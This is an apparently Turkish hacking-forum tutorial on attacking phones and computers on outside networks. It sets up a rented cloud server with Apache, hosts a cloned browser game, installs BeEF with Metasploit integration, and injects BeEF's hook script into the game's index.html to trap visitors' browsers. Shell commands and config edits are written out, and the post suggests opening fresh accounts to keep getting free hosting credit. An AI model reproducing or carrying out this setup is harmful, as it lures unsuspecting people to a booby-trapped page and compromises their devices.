Beef ile oyun konsolu üzerinden %100 dış ağdaki bilgisayar veya telefon hackleme-2019 - video izle

nessina

Yeni üye
17 Mar 2009
29
0
BEEF İLE OYUN KONSULU ÜZERİNDEN DIŞ AĞ SALDIRISI

TAM OLARAK ANLAYABİLMEK İÇİN VİDEOYU BURADAN İZLİYEBİLİRİSİNİZ

Öncelikle bir dış ağ sunucusuna sahip olmamız lazım ve bunu sağlayan digitalocean sitesine girip ilk önce kayıt yaptırmak gerekiyor .Kayıt olduktan sonra mailinize aktif linki gelecek ,aktifleştirdikten sonra kayıt için kredi kart bilgilerinizi istiyecektir ama bunun için sizden herhangi bir ücret kesintisi yapmayacak ,güvenilir bir sitedir Site ilk girişte size 100 dolar başlangıç hediyesi verecektir ancak 100 doları bitirdiğiniz zaman sunucudan yararlanamayacağınız için sizden ücret talep eder, talebiniz doğrultusunda isterseniz alırsınız.Şayet biterse yeni bir hesap alıp tekrardan ücretsiz yararlanabilirisiniz.

Digital Ocean Ücretsiz Kredi Kayıt Linki:
https://m.do.co/c/5ecb7c546723

kayıt olduktan sonra gelelim şimdi sunucu açmaya videodan adım adım izleyelim..

sunucu bu şekilde açtıktan sonra mailinize sunucu ip adresi kullanıcı adı ve şifresi gelecek burda ubuntudan faydalanacağız daha sonra kali linuxdan terminal açıp ubuntuya geçeceğiz. şimdi tekrardan adım adım atlamadan izleyelim

ssh root@ sunucu ip adresi
user root
password mailinize gelen şifreyi girin

Şifremizi değiştikten sonra şimdi ubuntumuz artık kendi kali linuxtaki sunucu üzerinden değil videoda izlediğimiz gibi Amsterdamdaki sunucu üzerinden bağlanacaktır . Siz sunucu seçerken ülkenize en yakın sunucuyu şeçmeye özen gösterin. bunu doğrulamak için ifconfig yaparak görebiliriz.

Ubuntuda hazır frameler yüklü olmadığı için bizim için gerekli olanları indiriyoruz

apt-get update
apt-get install apache2

sonra oyunumuzu indirmek için apache klasörümüze gidiyoruz

cd /var/www/html
ls
git clone https://github.com/thedenyz/gameplay2048

beef indirmek için önce bir klasör açacağız

cd /opt
mkdir Beef
ls
cd Beef

git clone https://github.com/beefproject/beef/wiki/Installation adresinde önerilen komutları girerek ubuntuya yükleyelim

./install

Şayet sizde de bu şekilde hata veriyorsa aşağıdaki komutları girin

sudo apt-add-repository ppa:brightbox/ruby-ng
sudo apt-get update
sudo apt-get install ruby2.4 ruby2.4-dev

şimdi beefte bir kaç önemli düzenleme yapmamız lazım yoksa hata alırız adım adım izleyin videodan

nano config.yaml

user: "beef"
passwd: "beef"
local host dış public adres yaz ve ****spoliti true yaptıktan sonra kntrl +O sonra ENTER tuşu sonra cntrl X tuşu ile çıkıyoruz

daha sonra cd extensions girip ls diyip ordanda ****spolit klasörüne gidip ls yapıyoruz

nano config.yaml

local host
call back host değiştir ve
en alta path boşluğu kalideki path ile birebir aynı yaz ve kntrl +O sonra ENTER tuşu sonra cntrl X tuşu ile çıkıyoruz

sonra cd .. beef klasörüne geri gelip çalıştırıyoruz

daha sonra beef i çalıştırıyoruz

./beef

Son adımda ise oyun konsolumuza BEEF’in bize verdiği scripi kopyalayıp apache serverindeki oyun klasöründe olan index.html dosyasına videoda olduğu gibi enjekte ediyoruz ve artık her şey hazır..

Nihayet sona geldik Kali linux tarayıcıdan beef URL’sini giriyoruz kullanıcı adı şifresini değiştirmiştik değiştirdiğimiz şifre ve kullanıcı adını giriyoruz....

VİDEOYU İZLEMEK İÇİN BURAYA TIKLAYABİLİRSİNİZ

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.